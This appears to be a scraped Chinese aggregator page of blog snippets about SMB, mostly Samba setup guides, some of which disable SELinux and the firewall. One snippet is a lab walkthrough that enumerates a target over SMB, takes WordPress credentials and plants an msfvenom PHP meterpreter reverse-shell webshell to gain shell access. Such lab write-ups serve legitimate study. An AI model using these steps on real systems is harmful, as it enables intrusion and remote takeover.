-
SMB
2019-10-30 09:55:34SMB是一个网络文件共享协议,它允许应用程序和终端用户从远端的文件服务器访问文件资源 SMB 一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、 写服务器上的文件,以及对...SMB是一个网络文件共享协议,它允许应用程序和终端用户从远端的文件服务器访问文件资源 SMB 一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、 写服务器上的文件,以及对服务器程序提出服务请求。此外通过 SMB 协议,应用程序可以访问远程服务器端 的文件 其另一个意思是Linux系统下的一个工具samba的简称smb Linux系统上默认安装samba Linux安装了samba软件后,就可以实现SMB,使得Linux可以和windows连在一起,实现二者的资源互享 Samba通过它可以轻松实现文件共享。Samba的功能很强大,在Linux服务器上的Samba运行起来以后,Linux 就相当于一台文件及打印服务器,向Windows和Linux Samba客户提供文件及打印服务。 ////////////////////////// kali上使用apt-get install samba安装samba软件 然后命令行输入samba,若成功表示安装成功
-
smb
2017-06-08 11:29:361.安装服务 [root@client ~]# yum install samba samba-common samba-client.x86_64 -y ... ~]# systemctl start smb nmb [root@client ~]# systemctl enable smb nmb 2.添加用户 [root@client ~]1.安装服务
[root@client ~]# yum install samba samba-common samba-client.x86_64 -y
[root@client ~]# systemctl start smb nmb
[root@client ~]# systemctl enable smb nmb
2.添加用户
[root@client ~]# smbpasswd -a student ##添加student用户
New SMB password: ##输入smb当前用户密码
Retype new SMB password: ##确认密码
Added user student.
[root@client ~]# pdbedit -L ##列出所有用户名
student:1000:User student[root@client ~]# pdbedit -x student ##删除用户名
[root@client ~]# setsebool samba_enable_home_dirs=1 ##在selinux上设置布尔值使smb用户可以访问自己的家目录
3.共享目录设定
[root@localhost ~]# vim /etc/samba/smb.conf
[haha] ##共享名称
comment = local directory ##对共享目录的描述
path = /smbshare ##共享目录的绝对路径
当共享目录为用户自建目录时
[root@localhost ~]# semanage fcontext -a -t samba_share_t '/smbshare(/.*)?' ##更改目录及其以下所有文件的安全上下文 [root@localhost ~]# restorecon -RvvF /smbshare/ ##刷新
当共享目录为系统建立目录时
[root@localhost ~]# vim /etc/samba/smb.conf [haha] comment = local directory path = /etc workgroup = WESTOS [root@localhost ~]# setsebool -P samba_export_all_ro on ##只读共享 [root@localhost ~]# setsebool -P samba_export_all_rw on ##读写共享
匿名用户
[root@localhost ~]# vim /etc/samba/smb.conf 125 map to guest = bad user ##将所有samba系统主机所不能正确识别的用户都映射成guest用户 guest ok = yes ##允许guest登录
访问控制
hosts allow = ##仅允许 hosts deny = ##仅拒绝
valid users = ##当前共享的有效用户
valid users = westos ##当前共享的有效用户
westos valid users = @westos ##当前共享的有效用户为westos组
valid users = +westos ##当前共享的有效用户为westos组
读写控制
所有用户均可写
[root@localhost ~]# chmod o+w /mnt [root@localhost ~]# setsebool -P samba_export_all_rw on [root@localhost ~]# vim /etc/samba/smb.conf writable = yes
- 1
- 2
- 3
- 4
- 1
- 2
- 3
- 4
设定指定用户可写
[root@localhost ~]# vim /etc/samba/smb.conf write list = student ##可写用户 admin users = westos ##共享的超级用户组 write list = @student ##可写用户组 write list = +student
- 1
- 2
- 3
- 4
- 5
- 1
- 2
- 3
- 4
- 5
mount -o username=student,password=redhat //172.25.254.119/haha /mnt touch
smb多用户挂载
在client上
vim /root/haha ##用户文件 username=student password=redhat chmod 600 /root/haha yum install cifs-utils -y mount -o credentials=/root/haha,multiuser,sec=ntlmssp //172.25.254.119/haha /mnt ##credentoals=/root/haha 指定挂载时所用到的用户文件 ##multiuser 支持多用户认证 ##sec=ntlmssp 认证方式为标准smb认证方式
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
测试
su - kiosk ls /mnt ls: cannot access /mnt: Permission denied ##因为没有做smb的认证 所以无法访问smb共享 cifscreds add -u westos 172.25.254.119 ##添加用户认证 Password: ##smb用户认证的密码 ls /mnt
-
centos smb
2020-01-04 21:28:07#查看版本号 hostnamectl ...安装smb yum install -y samba systemctl start smb nmb systemctl enable smb nmb systemctl restart smb nmb 查看smb/nmb的监听端口是否打开 netstat -anlpt |grep sm...#查看版本号
hostnamectl关闭防火墙
systemctl stop firewalld安装smb
yum install -y samba
systemctl start smb nmb
systemctl enable smb nmb
systemctl restart smb nmb查看smb/nmb的监听端口是否打开
netstat -anlpt |grep smb
netstat -anlpu | grep nmb添加到防火墙白名单放行
firewall -cmd --permanent --add-service=samba
firewall -cmd --reload关闭Selinux
setenforce 0查看selinux状态 sestatus 命令
永久关闭 SeLinux,修改配置文件/etc/selinux/config, vi /etc/selinux/config,将SELINU置为disabled
确保setlinux关闭,可以用setenforce 0命令执行。 默认的,SELinux禁止网络上对Samba服务器上的共享目录进行写操作,即使你在smb.conf中允许了这项操作。setenforce 1 设置SELinux 成为enforcing模式
setenforce 0 设置SELinux 成为permissive模式如果要彻底禁用SELinux 需要在/etc/sysconfig/selinux中设置参数
建立测试目录和用户(用户名 myy)
useradd myy
smbpasswd -a myy
smbpasswd -e myy
mkdir /data
chown myy /data检测用户是否添加成功
pdbedit -L给测试目录755权限
chown -R 0755 /data
chmod -R 0755 /data 给文件加权限
chown -R zhang:zhang /data 改变文件所属者cp -a
/etc/samba/smb
.conf
/etc/samba/smb
.conf.bak 复制配置文件做备份
vim /etc/samba/smb.conf[data]
path = /data
browseable = yes
writable = yes
guest ok = no
valid users = @myy
测试语法是否正确
testparmsystemctl restart smb nmb
-
SMB渗透
2020-02-25 17:02:06SMB渗透学习过程 1.SMB介绍 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中...SMB渗透学习过程
1.SMB介绍
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。
百度百科
准备条件:kali 攻击机:192.168.31.101
靶场: 192.168.31.622.探测过程
(1)使用
netdiscover -r 192.168.31.1/24(子网掩码)
探测到局域网内的靶场地址为:192.168.31.62
(2)使用nmap -sV 192.168.31.62(靶场地址)
探测靶场开放的服务
nmap指令详解
nmap -A -v -T4 192.168.31.62
针对smb协议弱点分析:使用smbclient -L 192.168.31.62
get deets.txt
到桌面,然后打开另一个终端,在桌面打开deets.txt查看
wp-config.php
cd/wordpress
get wp-config.php
gedit wp-config.php
使用mysql尝试连接
mysql 192.168.31.62 -u Admin -p
password : 粘贴密码
ssh Admin@192.168.31.62
粘贴密码
两种方式都失败
又因开启了http协议则使用
dirb http:192.168.31.62
找到wp-admin链接并打开
打开链接后使用账号密码登录,登录成功界面
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw
复制产生代码到本地gedit shell.php
启动监听 msfconsole
设置参数 use exploit/multi/handler set payload php/meterpreter/reverse_tcp show options set lhost 192.168.31.101 (攻击机地址) run
启动成功,等待连接
上传webshell代码
提交后浏览器输入访问点192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php
连接成功:
cat /etc/passwd
发现togie用户
切换到togie用户,密码为12345
提升权限
视频教程链接 -
SMB签名的基础知识(同时覆盖SMB1和SMB2)
2020-08-16 08:11:59SMB签名概述 服务器消息块(SMB)是Windows最常用的文件协议。SMB签名是一项功能,通过它可以在数据包级别对使用SMB的通信进行数字签名。对数据包进行数字签名可以使数据包的接收者确认其来源和真实性。SMB协议中... -
SMB操作
2019-12-17 13:44:26smb是一种网络文件协议,具体服务器配置参看 以下是一些常用的代码操作 import jcifs.smb.NtlmPasswordAuthentication; import jcifs.smb.SmbFile; //认证 NtlmPasswordAuthentication ntl=new ... -
SMB漏洞
2019-10-05 20:23:48一,SMB信息泄露 充电站: 二,MS17-010 (永恒之蓝) 复现 一,SMB信息泄露 靶场:192.168.11.167 攻击机:kali 192.168.11.165 信息探测: nmap -sV 192.168.11.167 可以看到开放了,22 ssh端口,139,445... -
smb安装
2018-11-07 20:39:31参考地址:https://www.linuxidc.com/Linux/2017-03/141254.htm... 修改smb用户登录密码 a smbpasswd smb1 修改smb服务器口令使用smbpasswd 命令,命令格式如下: smbpasswd 用户名 systemctl restart smb ... -
Summit可编程功率管理器件新增SMB113A和SMB117
2020-12-02 00:09:08日前,Summit Microelectronics发布了两款瞄准高功耗应用的新器件SMB113A和SMB117。这进一步扩充了可编程功率管理(PPM)芯片系列,可提供易用、灵活和高性能的功率供应设计。通过使用Summit的PPM芯片,设计人员只需要... -
SMB协议
2019-05-22 15:09:29systemctl start network.service...SMB协议 systemctl start smb nmb systemctl restart smb nmb vim /etc/samba/smb.conf 在此配置中添加以下项: +++++++++++++++++++++++++++++++++++++++++ [share] comment = h... -
SMB协议详解
2016-11-23 16:42:56SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用... -
SMB锁
2019-07-17 11:08:58SMB锁包括OPLOCK, open锁,范围锁,lease锁。 OPLOCK,即Opportunistic locking,用于保护Windows客户端缓存的从远端SMB服务器上文件进行读写的数据,解决分布式场景下缓存一致性问题的。同时可以减少客户端与SMB... -
SMB扫描
2019-04-30 19:49:21SMB(Server Message Block)协议,服务消息块协议,最开始是用于微软的一种消息传输协议,因为颇受欢迎,现在已经成为跨平台的一种消息传输协议。同时也是微软历史上出现安全问题最多的协议。它的实现复杂,并且默认... -
[SPMC17] Problems with SMB3 or SMB1
2021-01-02 10:50:33until today I had shared folders that worked with SMB1 and SPMC until today. 1. today's build changed to SMB3 protocol by default. with this way I couldn't connect to my shared folders. so I ... -
node-smb-server, SMB文件共享协议的100%位JavaScript实现.zip
2019-09-17 18:01:04node-smb-server, SMB文件共享协议的100%位JavaScript实现 用于 Node.js的 SMB服务器 Overwiewnode-smb-server 是 smb/cifs文件共享协议的开源JavaScript实现。一些亮点:纯 JavaScript完全可以配置/自定义可以扩展... -
issue of smb2_stat/smb2_opendir on windows
2020-12-09 01:18:22smb2_context <em>smb2 = smb2_init_context(); smb2_set_user(smb2, "username"); smb2_set_password(smb2, "password"); smb2_connect_share(smb2, "ip of A", "Users", ... -
smb 共享
2016-10-23 23:05:051.YUM安装SMB yum -y install smb 2.备份配置文件,并新建一个新的配置文件 cd /etc/samba/ mv smb.conf smb.conf.bak vim smb.conf security = share #share为匿名共享 [test] comment = te -
smb协议讲解_smb协议心得
2020-12-20 03:27:47*************SMB服务端代码实现*****************************************************************SMB协议解析************************************************************----------------------------------... -
smb协议讲解_SMB协议原理抓包分析
2020-12-20 03:27:50SMB协议原理抓包分析目录:1.SMB概述2.SMB原理3.SMB配置一、SMB概述SMB(全称是Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居就是靠它实现的。SMB 是一种客户机/... -
使用smbj.jar访问共享文件夹,解决SMB2/SMB3共享文件夹访问的问题
2018-11-05 18:38:38使用smbj.jar访问共享文件夹,支持SMB2/SMB3,用于解决使用jcifs.jar不支持SMB2/SMB3的问题 -
SMB服务
2015-11-18 13:16:00一、SMB1、SMB(Server Message Block)协议是windows中使用的文件共享协议,类似于linux系统的NFS,在类Unix系统中可以通过samba服务来实现SMB功能2、samba服务是SMB的开源实现,功能如下: -通过SMB协议进行文件...
-
马原超级简略复习版(马克思基本原理)
-
继承和派生(2)--继承中对构造函数、同名函数的处理方式
-
(新)备战2021软考网络规划设计师培训学习套餐
-
Java学习路线,好的学习路线和好的方法,能让我们少走些弯路
-
JAVA基础.xmind
-
彻底学会正则表达式
-
OpenSceneGraph Quick Start Guide_ 快速入门.pdf
-
HTML5手机抽奖游戏活动静态页面集合.zip
-
整合的PCB封装库 intLib.zip
-
Collections.xmind
-
2020CCF工作负载预测(LGB单模 0.34+)方案
-
国家注册渗透测试工程师(Web安全)
-
numpy的 copy & deep copy 浅拷贝和深拷贝
-
神奇又好玩的协方差矩阵
-
Ubuntu20.04 —— Anaconda3
-
操作系统对SSE和AVX等指令集的支持
-
在线教育app移动端页面psd设计稿.zip
-
KMP算法代码及next数组解析
-
Qt:多线程--子线程间通讯
-
Matlab——基于扩展卡尔曼滤波的锂电池SOC估计.zip